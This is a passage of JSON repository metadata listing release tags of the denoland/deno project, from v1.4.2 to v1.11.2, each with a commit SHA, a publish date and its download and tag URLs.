2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecos